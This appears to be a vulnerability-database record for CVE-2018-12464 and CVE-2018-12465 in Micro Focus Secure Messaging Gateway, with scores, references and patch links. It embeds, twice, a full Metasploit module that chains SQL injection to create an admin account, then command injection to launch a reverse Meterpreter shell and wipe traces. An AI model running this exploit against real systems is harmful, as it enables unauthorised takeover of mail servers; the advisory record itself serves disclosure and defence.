\u0027securitygate.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027username\u0027 =\u003e @username,\n        \u0027password\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027passwordmandatory\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027LimitInterfaceId\u0027 =\u003e 1\n      }\n    )\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027/ui/default/index.php\u0027)\n      print_good(\u0027Successfully authenticated\u0027)\n      cookie = res.get_cookies\n    else\n      something_went_wrong\n    end\n    cookie\n  end\n\n  def exploit\n    unless check == CheckCode::Vulnerable\n      fail_with Failure::NotVulnerable, \u0027Target is not vulnerable\u0027\n    end\n\n    create_user\n    cookie = login\n    implant_payload(cookie)\n\n    print_status(\u0027Triggering an implanted payload\u0027)\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_dkim_keygen_request.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027DkimRecordId\u0027 =\u003e @dkimid\n      }\n    })\n\n  end\n\n  def on_new_session(session)\n    print_status(\u0027Cleaning up...\u0027)\n    cmd = \"\"\n    cmd \u003c\u003c \u0027PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"\u0027\n    cmd \u003c\u003c \"DELETE FROM account WHERE loginname =\u0027#{@username}\u0027;\"\n    cmd \u003c\u003c \"DELETE FROM UserRole WHERE idaccount = #{@userid};\"\n    cmd \u003c\u003c \"DELETE FROM Domain WHERE iddomain = #{@domainid};\"\n    cmd \u003c\u003c \"DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};\"\n    cmd \u003c\u003c \u0027\"\u0027\n    session.shell_command_token(cmd)\n  end\n\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "BID",
            "id": "106343"
          },
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          }
        ],
        "trust": 2.07
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-122426",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-12464",
            "trust": 2.9
          },
          {
            "db": "EXPLOIT-DB",
            "id": "45083",
            "trust": 2.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "106343",
            "trust": 0.3
          },
          {
            "db": "PACKETSTORM",
            "id": "148758",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-122426",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "db": "BID",
            "id": "106343"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "id": "VAR-201806-1215",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          }
        ],
        "trust": 0.85
      },
      "last_update_date": "2024-11-23T22:34:15.375000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Critical SQL Injection Vulnerability in SMG (CVE-2018-12464)",
            "trust": 0.8,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
          },
          {
            "title": "Micro Focus Secure Messaging Gateway Web administration  and quarantine Component SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81644"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.0,
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          },
          {
            "trust": 2.0,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
          },
          {
            "trust": 1.7,
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "trust": 0.9,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12464"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12464"
          },
          {
            "trust": 0.3,
            "url": "https://www.exploit-db.com/exploits/45083"
          },
          {
            "trust": 0.3,
            "url": "https://www.microfocus.com/products/secure-messaging-gateway/"
          },
          {
            "trust": 0.3,
            "url": "https://www.microfocus.com"
          },
          {
            "trust": 0.1,
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12465"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "https://support.microfocus.com/kb/doc.php?id=7023133\u0027]"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "db": "BID",
            "id": "106343"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "db": "BID",
            "id": "106343"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-06-29T00:00:00",
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "date": "2018-06-27T00:00:00",
            "db": "BID",
            "id": "106343"
          },
          {
            "date": "2018-09-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "date": "2018-07-31T14:49:49",
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "date": "2018-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          },
          {
            "date": "2018-06-29T16:29:00.277000",
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-122426"
          },
          {
            "date": "2018-06-27T00:00:00",
            "db": "BID",
            "id": "106343"
          },
          {
            "date": "2018-09-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          },
          {
            "date": "2024-11-21T03:45:16.117000",
            "db": "NVD",
            "id": "CVE-2018-12464"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Micro Focus Secure Messaging Gateway In  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006867"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "sql injection",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "148758"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-018"
          }
        ],
        "trust": 0.7
      }
    }

    VAR-201806-1216

    Vulnerability from variot - Updated: 2024-11-23 22:34

    An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5). The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info={}) super(update_info(info, 'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user.

        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. 
        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
        to access this endpoint without having a valid session.
    
        Combining these vulnerabilities gives the opportunity execute operation system commands under the context
        of the web user. 
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
          ['CVE', '2018-12464'],
          ['CVE', '2018-12465'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
        ],
      'DefaultOptions'  =>
        {
          'Payload' => 'php/meterpreter/reverse_tcp',
          'Encoder' => 'php/base64'
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 19 2018",
      'DefaultTarget'  => 0
    ))
    
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
    

    end

    def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3))

    send_request_cgi(
      'method'  => 'POST',
      'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
      'vars_post' => {
        'appkey' => sql
      }
    )
    

    end

    def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end

    def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end

    def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } })

    if res && res.code == 200 && res.body.include?('DbNodeId')
      # Defining as global variable since we need to access them later within clean up function. 
      begin
        @domainid  = res.get_json_document['Nodes'][0]['DbNodeId']
        @dkimid  = res.get_json_document['Nodes'][1]['DbNodeId']
      rescue => e
        fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
      end
      print_good('Payload is successfully implanted')
    else
      something_went_wrong
    end
    

    end

    def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges')

    # Defining as global variable since we need to access them later within clean up function. 
    @username = rand_text_alpha_lower(5..25)
    @userid = rand_text_numeric(6..8)
    query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
    
    execute_query(query)
    res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")
    
    if res && res.code == 200 && res.body.include?(@username)
      print_good("User successfully created. Username : #{@username}")
    else
      something_went_wrong
    end
    

    end

    def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end

    def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end

    create_user
    cookie = login
    implant_payload(cookie)
    
    print_status('Triggering an implanted payload')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
      'cookie' => cookie,
      'vars_get' => {
        'cache' => 0,
      },
      'vars_post' => {
        'DkimRecordId' => @dkimid
      }
    })
    

    end

    def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end

    end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1216",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "secure messaging gateway",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "microfocus",
            "version": "471"
          },
          {
            "model": "micro focus secure messaging gateway",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "471"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:microfocus:secure_messaging_gateway",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Mehmet Ince",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "148758"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2018-12465",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2018-12465",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-122427",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2018-12465",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security@opentext.com",
                "availabilityImpact": "HIGH",
                "baseScore": 9.1,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.3,
                "id": "CVE-2018-12465",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-12465",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "security@opentext.com",
                "id": "CVE-2018-12465",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-12465",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201807-017",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-122427",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2018-12465",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-122427"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-12465"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-006868"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201807-017"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-12465"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5). The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n\n  def initialize(info={})\n    super(update_info(info,\n      \u0027Name\u0027           =\u003e \"MicroFocus Secure Messaging Gateway Remote Code Execution\",\n      \u0027Description\u0027    =\u003e %q{\n        This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. \n        An unauthenticated user can execute a terminal command under the context of the web user. \n\n        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. \n        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It\u0027s not possible\n        to access this endpoint without having a valid session. \n\n        Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n        of the web user. \n      },\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Mehmet Ince \u003cmehmet@mehmetince.net\u003e\u0027 # author \u0026 msf module\n        ],\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027URL\u0027, \u0027https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],\n          [\u0027CVE\u0027, \u00272018-12464\u0027],\n          [\u0027CVE\u0027, \u00272018-12465\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023132\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023133\u0027]\n        ],\n      \u0027DefaultOptions\u0027  =\u003e\n        {\n          \u0027Payload\u0027 =\u003e \u0027php/meterpreter/reverse_tcp\u0027,\n          \u0027Encoder\u0027 =\u003e \u0027php/base64\u0027\n        },\n      \u0027Platform\u0027       =\u003e [\u0027php\u0027],\n      \u0027Arch\u0027           =\u003e ARCH_PHP,\n      \u0027Targets\u0027        =\u003e [[ \u0027Automatic\u0027, { }]],\n      \u0027Privileged\u0027     =\u003e false,\n      \u0027DisclosureDate\u0027 =\u003e \"Jun 19 2018\",\n      \u0027DefaultTarget\u0027  =\u003e 0\n    ))\n\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The URI of the vulnerable instance\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  def execute_query(query)\n    #\n    # We have a very rare SQLi case in here. Normally, it\u0027s would be very easy to exploit it by using time-based techniques\n    # but since we are able to use stacked-query approach, following form of payload is required in order to be able\n    # get back the output of query !\n    #\n    sql = rand_text_alphanumeric(3 + rand(3))\n    sql \u003c\u003c \"\u0027) LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; \"\n    sql \u003c\u003c query\n    sql \u003c\u003c \"; -- \"\n    sql \u003c\u003c rand_text_alphanumeric(3 + rand(3))\n\n    send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027api\u0027, \u00271\u0027, \u0027enginelist.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027appkey\u0027 =\u003e sql\n      }\n    )\n\n  end\n\n  def something_went_wrong\n    fail_with Failure::Unknown, \u0027Something went wrong\u0027\n  end\n\n  def check\n    r = rand_text_numeric(15..35)\n    res = execute_query(\"SELECT #{r}\")\n    unless res\n      vprint_error \u0027Connection failed\u0027\n      return 